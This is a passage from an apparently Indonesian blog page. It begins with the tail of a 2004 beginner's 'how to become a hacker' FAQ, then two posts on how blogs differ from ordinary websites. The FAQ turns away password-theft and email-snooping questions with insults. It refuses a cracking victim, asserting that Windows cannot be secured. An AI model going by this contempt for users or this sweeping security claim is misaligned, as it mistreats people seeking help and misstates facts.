insinyur elektro :-)). Sejumlah dasar di matematika finit (termasuk aljabar Bool,
teori himpunan hingga, kombinasi, dan teori graph) berguna.

T : Tentang pemrograman Web , apakah harus ?
J : Yupe, dikarenakan Internet adalah dunia kamu nantinya

T : Bahasa pemrograman web apa yang sebaiknya dipelajari untuk pemula ?
J : Mungkin kamu bisa mencoba HTML, dilanjutkan ke PHP yang akan membuat kamu lebih
familiar ke programing secara penuh

T : Tentang Sistem Operasi , kenapa harus ?
J : Penguasaan terhadap suatu operating system adalah sangat penting, kenapa ?
karena itulah lingkungan kamu nantinya , perdalami cara kerja suatu operating
system , kenali dan akrabkan diri :)

T : Sebaiknya, Operating system apa yang saya perdalami?
J : mungkin kamu bisa coba linux atau BSD , selain mereka free , dukungan komunitas
juga sangat banyak sehingga kamu tidak akan di tinggal sendirian jika menemukan
masalah, dan pula kemungkinan kamu untuk dapat berkembang sangatlah besar
dikarenakan sifat "open source"

T : Untuk pemula seperti saya , apa yang harus saya gunakan ?
J : Sebaiknya jika kamu benar benar pemula, kamu bisa gunakan linux , karena baik
sistem installasinya dan Graphical User Interfacenya lebih memudahkan kamu

T : Distro apa yang sebaiknya saya gunakan dan mudah untuk pemula
J : Kamu bisa mencoba Mandrake (disarankan oleh beberapa ahli yang pernah diajak
diskusi) , tetapi kamu bisa memilih sesukamu, meskipun aku memulainya juga
dengan mandrake tetapi aku lebih comfort dengan redhat.

T : Kalau tidak bisa Menginstall linux apakah jalan saya sudah tertutup?
J : Kamu bisa mencoba menginstall vmware , cygwin atau kamu bisa menyewa shell

T : Dimana Saya bisa mendapatkan programn program tersebut
J : berhentilah bertanya , dan arahkan browser kamu ke search engine , terlalu
banyak situs penyedia jasa yang dapat membantu kamu

T : Apakah saya HArus memiliki komputer ?
Y : IYA! , kecuali kalo kamu sudah dapat berinteraksi lebih lama dengan komputer
meskipun itu bukan milik kamu, tetapi sangat baik jika memilikinya sendiri
karena , pertama : Ide yang timbul bisa setiap saat, baik programing, riset
dsb, jadi ada baiknya kamu memilikinya agar dapat langsung
menyalurkan semua ide dan pemikiran kamu
Kedua : menggunakan PC sendiri membuat kamu merasa bebas untuk
bereksplorasi dan mencoba tanpa takut merusak dsb

T : Hardware apa yang saya butuhkan ?
Y : Menginggat harga komputer sudah relatif "murah" (mohon maaf buat yang masih belum
mampu membelinya) , kamu bisa sesuaikan spesifikasinya untuk kamu gunakan

T : Internet , apakah saya harus terkoneksi ke internet?
Y : Terkadang itu perlu, tetapi jangan terlalu memaksakan , kamu memang perlu terhubung
ke internet untuk mendownload modul, bacaan, update informasi, tetapi jangan jadikan
penghalang jika kamu tidak bisa terkoneksi secara periodik, jadilah kreatif


[1] T : Berapa lama waktu yang saya butuhkan?
J : Masalah waktu itu relatif, Bergantung seberapa besar bakat dan usaha Anda.
Kebanyakan orang memperoleh keahlian yang cukup dalam delapan belas bulan
atau dua tahun, jika mereka berkonsentrasi. Tapi jangan pikir setelah itu
selesai; jika Anda hacker sejati, Anda akan menghabiskan sisa waktu belajar
dan menyempurnakan keahlian.

T : Apakah tidak bisa yang Instan ? misal Tinggal gunain tool tertentu ?
J : Hum, kamu mo jadi hacker atau cuma pemakai tools ?, kalau menggunakan tools
semua orang juga bisa!!


[1] T : Bagaimana cara mendapatkan password account orang lain?
J : Ini cracking. Pergi sana, bodoh.

[1] T : Bagaimana cara menembus/membaca/memonitor email orang lain?
J : Ini cracking. Jauh-jauh sana, goblok

[0] T : Cracker ? apa itu ?
J : Cracker adalah individu yang mencoba masuk ke dalam suatu sistem komputer
tanpa ijin (authorisasi), individu ini biasanya berniat jahat/buruk, sebagai
kebalikan dari 'hacker', dan biasanya mencari keuntungan dalam memasuki suatu
sistem

[1] T : Saya dicrack. Maukah Anda menolong saya mencegah serangan berikutnya?
J : Tidak. Setiap kali saya ditanya pertanyaan di atas sejauh ini, ternyata
penanyanya seseorang yang menggunakan Microsoft Windows. Tidak mungkin secara
efektif melindungi sistem Windows dari serangan crack; kode dan arsitektur
Windows terlalu banyak mengandung cacat, sehingga berusaha mengamankan Windows
seperti berusaha menyelamatkan kapal yang bocor dengan saringan. Satu-satunya
cara pencegahan yang andal adalah berpindah ke Linux atau sistem operasi lain
yang setidaknya dirancang untuk keamanan.

T : Apakah saya perlu komunitas ?
J : YUPE , komunitas sangat kamu perlukan, apalagi jika kamu memilih untuk berkecimpung
di dunia opensource, banyak milis yang bisa kamu ikuti, sebaiknya ikuti milis yang
spesifik sesuai dengan yang kamu gunakan. (misal linux, sesuai distro )

T : Apakah termasuk milis sekuriti ?
J : iyah ! cobalah bugtraq@securityfocus.com



ReFerensi :

[0]. *RFC1392,Internet User Glossary
[1]. How to Become A Hacker - Eric S Raymond
Terjemahan Indonesia dari How To Become A Hacker - Steven Haryanto
[2]. Ezine at http://ezine.echo.or.id
[3]. Milis Newbie_hacker@yahoogroups.com
[4]. #e-c-h-o room @t DALNET
. Pendapat pribadi , hasil diskusi, MIlis lain , forum, Chatting

*greetz to:
[echostaff : moby, comex, the_Day, z3r0byt3, K-159, c-a-s-e, S'to]
{ISICteam : yudhax, anton, balai_melayu, wisnu, biatch-X },

anak anak newbie_hacker[at]yahoogroups.com , #e-c-h-o , #aikmel

kirimkan kritik && saran ke y3dips[at]echo.or.id

*/0x79/0x33/0x64/0x69/0x70/0x73/* (c)2004

Selasa, 16 Desember 2008

Beda Blog dan Website

Ternyata masih banyak di dunia sana yang bingung tentang definisi sebuah blog, format blog, dan apa kaitannya dengan nama domain.

Isu 1: Apa beda blog dan website?

Blog itu ya sebuah website. Yang namanya website bisa ada beragam. Kalau sebuah website itu berisikan banyak berita terkini dan menjadi pusat segala informasi, maka website itu bisa dikategorikan dalam portal. Misalnya: Kompas.com, Detik.com, PortalHR.com, Seleb.tv, Kapanlagi.com, dll. Masing-masing portal biasanya punya segmennya sendiri-sendiri. Makanya, ada yang disebut dengan portal berita, portal hiburan, portal pendidikan, dan macam-macam.

Ada pula website yang dikategorikan sebagai website komunitas, dimana isinya berisi sekumpulan anggota yang mempunyai ketertarikan yang sama. Misalnya: Kaskus.us, Kafegaul.com, Bluefame.com, dll. Ada lagi yang komunitas tapi berfokus pada jejaringan sosial, seperti Friendster.com, Fupei.com, LiveConnector.com, dll.

Nah, blog adalah website yang isinya berupa tulisan-tulisan yang merupakan opini dari pemilik blog. Biasanya blog disajikan berurutan berdasarkan tanggal. Tulisan terbaru yang dibuat, dimunculkan di paling atas. Ciri lain dari blog adalah adanya komentar. Pembaca blog bisa memberikan tanggapan terhadap isi tulisan. Penulis blog bisa memberikan balasannya pula di bagian komentar itu.

Isu 2: Apakah blog itu harus gratis?

Nggak juga. Kebetulan saja kebanyakan penyedia blog memberikannya secara gratis. Ada pula penyedia layanan blog premium di negeri luar sana. Jadi, nggak ada hubungannya sebuah blog dengan layanannya yang gratis atau berbayar.

Isu 3: Apa hubungannya blog dengan penggunaan alamat domain sendiri?

Untuk mereka yang baru awal-awal ngeblog, mungkin akan lebih efisien untuk membuat blog di beberapa penyedia layanan blog gratisan, seperti: Blogger.com, Wordpress.com, Dagdigdug.com, Blogdetik.com, Bedeng.com, dll. Nggak perlu pusing-pusing mendesain blog sendiri. Cukup pakai yang ada saja, tinggal tulis dan jadilah sebuah blog yang dimiliki sendiri.

Namun, untuk mereka yang mulai serius ngeblog, dan ingin membangun personal branding, sebaiknya dimulai dengan membangun blog dengan alamat domain sendiri. Alamat domain bisa diakhiri dengan .com, .net, .org, .tv, dan macam-macam. Sesuka pemilik blog saja. Hanya bedanya, untuk memiliki blog di alamat domain sendiri, si empunya blog harus menyisihkan sedikit uang untuk membeli alamat domain dan sewa server.

Yang disebut blog lebih ke metode penyampaian pemikiran, dan nggak ada hubungannya dengan dimana blog itu berada. Apakah blog itu di blogspot.com atau di blogsayasendiri.com, kalau isinya adalah tulisan/opini pribadi si penulis, maka bisa disebut sebagai sebuah blog.

Isu 4: Apa isi blog itu harus bercerita tentang curhat atau pengalaman diri sehari-hari?

Dulu, pada awalnya memang banyak blog bercerita tentang kehidupan pribadi penulisnya. Namun, kini kebanyakan blog mulai membahas hal-hal yang tidak ada hubungannya dengan pribadi.

Blog VS situs biasa, apa bedanya?

Blog VS situs biasa, apa bedanya?

Beberapa waktu lalu, ada teman yang berteriak kegirangan setelah menemukan situs pribadi seorang pejabat terkenal. "Wah, Pak Anu sekarang punya blog pribadi. Hebat euy!" ujarnya.

Karena penasaran, saya mengakses situs Pak Anu tersebut. Tapi setelah melihatnya, saya terkejut. Menurut saya, itu bukan blog. Itu hanya situs biasa.

Hm... sebenarnya apa perbedaan antara blog dengan situs biasa?
Terus terang, saya sudah memikirkan hal ini sejak beberapa hari lalu. Saya bahkan hampir menulis artikel mengenai hal ini pada Rabu, 29 Maret 2006. Tapi saya urungkan, karena saya belum menemukan jawaban yang pas.

Saya pun mencoba membuat analisis kecil-kecilan. Mungkin cerita ini mirip dengan kronologis ketika Nabi Ibrahim mencari Tuhan. Hehehehe...

Analisis 1:
Blog adalah semua situs yang dibuat pada penyedia layanan blog, seperti blogger.com, multiply.com, blogdrive.com, dan sebagainya. Atau, ia dibuat dengan blog engine semacam wordpress.com, pmachine.com, movable type, dan sebagainya.

Bantahan:
Itu ada benarnya, tapi tidak 100 persen benar! Saya melihat banyak situs yang dibuat dengan blog engine, atau dihosting di blogger.com misalnya, tapi ternyata itu bukan blog. Contohnya adalah situs www.penulislepas.com yang saya buat dan kelola. Situs ini dibangun dengan blog engine PMachine. Tapi menurut saya, penulislepas.com bukan sebuah blog!

Analisis 2:
Blog adalah semua situs yang dimiliki secara pribadi.

Bantahan:
Banyak situs buatan pribadi yang ternyata bukan blog. Sebaliknya, banyak situs milik perusahaan tertentu, yang ternyata adalah blog (Contohnya adalah Official Google Blog).

Analisis 3:
Blog adalah situs yang berisi hal-hal yang mencerminkan suara hati si pemiliknya secara pribadi.

Bantahan:
Ternyata banyak blog yang isinya bukan suara hati. Misalnya, ada blogger yang mengisi blognya dengan resensi film, artikel tips dan trik penggunaan komputer, dan sebagainya. Bahkan banyak blog yang hanya berisi copy paste artikel dari situs lain.

Hal-hal seperti ini bukan suara hati, tapi menurut saya situs seperti ini masih bisa dikategorikan blog. Kenapa? Jawabannya akan saya sampaikan pada bagian akhir tulisan ini, hehehehe... :)

Analisis 4:
Blog adalah situs-situs yang dilengkapi RSS atau fitur agretator lainnya.

Bantahan:
Banyak portal berita yang dilengkapi RSS, tapi mereka bukan blog!

Analisis 5:
Blog adalah situs-situs yang dilengkapi fitur comment serta tagboard/shoutboard,

Bantahan:
Banyak situs biasa yang juga memiliki fitur-fitur seperti itu, tapi mereka pun bukan blog.

* * *

Wah. jadi apa sebenarnya blog itu? Apa bedanya dengan situs biasa?

Saya memikirkan hal ini selama beberapa hari. Dan alhamdulillah, hari Jumat kemarin (31 Maret 2006), saya menemukan jawabannya! Mungkin ini bukan jawaban yang benar. Tapi setidaknya, saya menemukan formula yang cukup masuk akal, dan bisa menjelaskan sebuah definisi yang unik, yang memang benar-benar membedakan secara tegas antara blog dengan situs biasa.

Dan inilah kesimpulan saya:

Blog adalah semua situs yang memiliki TIGA ciri khas berikut:

1. Dikelola langsung oleh si pemilik blog. Jadi, kalau ada situs pribadi seorang presiden atau gubernur yang diisi oleh petugas yang dibayar, maka itu bukan blog!

Mungkin ada orang yang meminta tolong orang lain untuk meng-update situsnya. Tapi selama materi yang dimuat adalah hasil karya si pemilik situs sendiri, ATAU keputusan untuk memilih materi apa saja yang dimasukkan di situs tersebut berada di tangan si pemilik situs (jika materi tersebut bukan karya si pemilik situs), maka menurut saya situs ini tetap layak disebut blog. Tentang siapa yang meng-upload materi tersebut, ini hanya masalah teknis.

2. Struktur content-nya amat personal, tidak mengikuti standar atau kaidah-kaidah yang berlaku secara umum.

Yang dimaksud di sini bukan "isi" atau "content" dari si situs, melainkan strukturnya. Misalnya: pada situs portal pada umumnya, biasanya ada rubrikasi atau fitur-fitur yang dibuat berdasarkan standar atau kaidah yang berlaku secara umum.

Situs www.penulislepas.com misalnya. Saya membangun struktur content-nya berdasarkan pengetahuan saya seputar jurnalistik, media massa, dan website secara umum. Memang, ada sentuhan pribadi pada situs ini. Tapi saya harus banyak berkompromi dengan kaidah dan atau standar umum tersebut. Maka, penulislepas.com bukan blog.

Nah, blog adalah situs yang dibangun dengan sentuhan yang amat personal. Mungkin ada struktur content, ada rubrikasi, dan sebagainya. Tapi semuanya dibuat dengan standar yang amat subjektif, tidak mematuhi kaidah atau standar yang diakui secara umum. Pokoknya, struktur yang dibuat adalah sesuai dengan keinginan si blogger.

3. Situs tersebut memiliki mekanisme untuk meng-update content secara berkelanjutan (continue). Jadi, ia bukan situs yang berisi "company profile" atau "profil saya" dan sebagainya, yang tidak membutuhkan proses content updating (kecuali kalau ada perubahan mendasar sehingga content situs benar-benar harus direvisi).


* * *

Jadi, ketiga ciri di ataslah yang melekat pada blog. Sebuah situs disebut blog hanya jika ia memiliki ketiga ciri tersebut. Tidak boleh hanya satu di antaranya. Ketiganya harus ada. Mereka satu paket :)

Sekarang, mari kita bahas sosok sejumlah blog yang bukan berisi suara hati si pemiliknya. Blog-blog tersebut mungkin berisi review film, resensi buku, tips dan trik berkomputer, dan sebagainya. Sama sekali tak ada tulisan-tulisan yang bersifat personal.

Memang, secara content, blog-blog seperti ini mirip sekali dengan majalah online, portal berita, atau apapun namanya. Tapi saya tetap menyebutnya blog, karena ia memenuhi ketiga ciri di atas. Situs ini dikelola langsung oleh pemiliknya, struktur content-nya pun amat personal, dan ada mekanisme content update.

Lantas, bagaimana dengan blog yang hanya berisi artikel copy paste dari situs-situs lain?

Menurut saya, situs-situs seperti ini tetap layak disebut blog. Sebab, si blogger tentu hanya meng-copy paste tulisan-tulisan yang sesuai dengan suara hatinya. Materi apapun yang ia copy paste ke situs pribadinya, itu semua tetap didasari oleh keputusan dan kaidah/standar yang bersifat personal.

* * *

Ups... tapi kenapa tidak ada unsur BLOG ENGINE pada ciri-ciri di atas? Apakah itu tidak penting? Bukankah blog engine itu merupakan sumber daya yang amat memudahkan pembuatan dan pengelolaan blog? Bukankah blog engine merupakan ciri yang amat kental melekat pada setiap blog?

Ya, memang. Semula saya pun ragu mengenai hal ini. Saya bahkan sempat berpikir: Dengan ciri-ciri blog yang hanya terdiri atas ketiga unsur di atas, maka situs pribadi yang dihosting di Geocities.com dan dibangan dengan HTML biasa pun, layak disebut blog. Padahal, saya yakin hal ini akan ditentang oleh banyak orang.

Tapi saya mencoba berpikir lebih lanjut. Saya ingat sejarah asal-usul blog. Awalnya, blog-blog yang muncul di internet justru dibangun dengan kode HTML biasa. Tapi tentu saja, mereka adalah blog.

Blog engine memang amat bermanfaat dan merupakan ciri khas yang amat kental pada setiap blog. Tapi menurut saya, blog engine hanyalah sebuah teknologi yang mempermudah pekerjaan kita. Ia bisa digunakan untuk membangun situs apapun, tidak hanya blog.

Dan blog engine sebenarnya bukanlah keharusan bagi sebuah blog. Bisa saja, ada orang yang bisa membangun situs yang memenuhi ketiga ciri di atas, tapi dia tidak memanfaatkan blog engine. Bisa saja ia menggunakan kode HTML biasa. Maka, situs ini pun layak disebut blog. Adapun mengenai kerepotan atau hal-hal lain yang harus dia hadapi, saya kira itu adalah urusan pribadi si blogger sendiri. Kalau dia tidak keberatan dengan hal itu, buat apa kita permasalahkan?

* * *

Demikianlah definisi blog bagi saya, saat ini. Mungkin konsep ini tidak benar, banyak kelemahannya, masih perlu direvisi, dan sebagainya. Karena itu, saya menunggu masukan dari teman-teman sekalian.